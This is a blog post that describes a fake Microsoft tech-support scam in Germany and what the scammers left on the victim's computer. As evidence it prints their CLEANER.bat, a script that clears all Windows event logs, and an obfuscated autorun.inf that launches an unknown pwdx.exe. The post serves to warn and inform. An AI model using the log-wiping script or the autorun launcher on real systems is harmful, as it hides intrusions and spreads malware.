It all starts with a phone call where these guys say they're from Microsoft and on the computer is an issue to be fixed.
Interestingly, they're are even calling people in Germany only speaking English and just a bit of German.
In case there were comprehension problem they used internet translation tools to move forward and they always said when this procedure costs something, they will say it (as seen later...).
Getting access
To show the people that they're trustworthy they mention a combination of numbers and later show them the exact same digits somewhere on the computer. I don't know which numbers, but obviously a combination which is on all Windows machines the same.
For getting the access they're letting their victims go to https://showmypc.com to download a remote support tool. This tool apparently includes a service and a version of Tight VNC.
Additionally they are using the tool "LogMeIn Rescue" (https://secure.logmein.com) for file transfer. Then they're copying a txt file to the desktop with following three lines to 'prove' they're real:
My Name = Christopher winter
My Employee ID = MS98646
Our Email Address = support@microsoft.com
The 'cleaning'
During this remote session the tool ATF cleaner was copied to the computer. According to the website (www.atribune.org) this software is from 2006 - so for Windows 2000 and Windows XP. There are extra notes added for the support of Windows Vista.
The tool is just able to delete cache from Firefox and Opera. Concerning its age the only reason for using this exe must be to distract from something. Maybe from the batch file which was copied and executed shortly afterwards - name: CLEANER.bat.
Correct me, if I'm wrong, but its purpose is to get admin access and delete the event logs.
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL
By that time the fake support guy said that he wants to install a special cleaning software for something around 90 euros. He couldn't send an email or other information material. It was about just installing it now or not. After that the user of the computer ended the call.
The CLEANER.bat wasn't deleted properly, because I found it in the Recycle Bin. But the eventlog was starting from new...
Further traces
In 'Run' (Windows+R) I found the following commands which were last used:
iexplorer support.me (leads to https://secure.logmeinrescue.com/Customer/Code.aspx)
services.msc
eventvwr
certmgr.msc
prefetch
winver
msconfig
Looking for further hints for what has been done, I saw two suspicious files where the changing time was exactly during the end of the time when the support had access. In the root folder of the second hard drive is a pwdx.exe and an autorun.inf which should open the exe-file (see below).
;wnylejSrKiV rQxf eiYqRlldTudXghdrnqmBjyIgAeaGLphfkBfnuegSkajgEnux
;
open= pwdx.exe
;
sHeLL\exPLOre\COmmanD = pwdx.exe
;fLeR
shell\OpeN\cOmmAND=pwdx.exe
;
sHElL\AutOpLay\cOmmand =pwdx.exe
[AutoRun]
;
shell\opEN\DeFaULt=1
About the pwdx.exe I'm not sure what that exactly is. I only found the information that it's a maybe a Linux-based monitoring tool. Please comment, if you know more.
Anyway, the computer was filled with these virus warning windows as seen on the right. And there was also a warning message from the internet service provider the next day.
During the time the session was running, anything could have been done. These are just the few things I've found in a short amount of time.
After this event the computer wasn't connected to the internet anymore. A reinstallation was more than necessary...
Note: If anybody knows more about these fake helpdesk people or has his oder her experiences about it, feel free to comment.
No comments:
Post a Comment